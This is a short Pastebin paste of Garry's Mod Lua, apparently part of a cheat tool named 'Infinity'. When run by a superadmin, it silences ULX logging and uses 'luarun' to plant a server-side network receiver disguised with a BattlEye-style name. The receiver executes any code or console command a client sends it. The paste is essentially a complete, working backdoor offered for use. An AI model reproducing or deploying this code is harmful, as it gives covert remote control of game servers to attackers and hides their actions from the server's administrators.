2much4Us

Untitled

Jun 1st, 2018
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. chat.AddText( Color( 0, 255, 255 ), "[Infinity]", Color( 255, 255, 255 )," Injecting..." )
  2. if ( ply:IsSuperAdmin() ) then
  3. if( ValidNetString("Infinity_Meme") ) then
  4.  
  5. else
  6. RunConsoleCommand( "ulx", "logecho", "0" )
  7. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString('_Battleye_Meme_') net.Receive('_Battleye_Meme_', function( length, ply ) local netString = net.ReadString() local bit = net.ReadBit() if bit == 1 then RunString(netString) else game.ConsoleCommand(netString .. '\n') end end)" )
  8. chat.AddText( Color( 0, 255, 255 ), "[Infinity]", Color( 0, 255, 0 )," Successfully paused!" )
  9. end
  10. end
Add Comment
Please, Sign In to add comment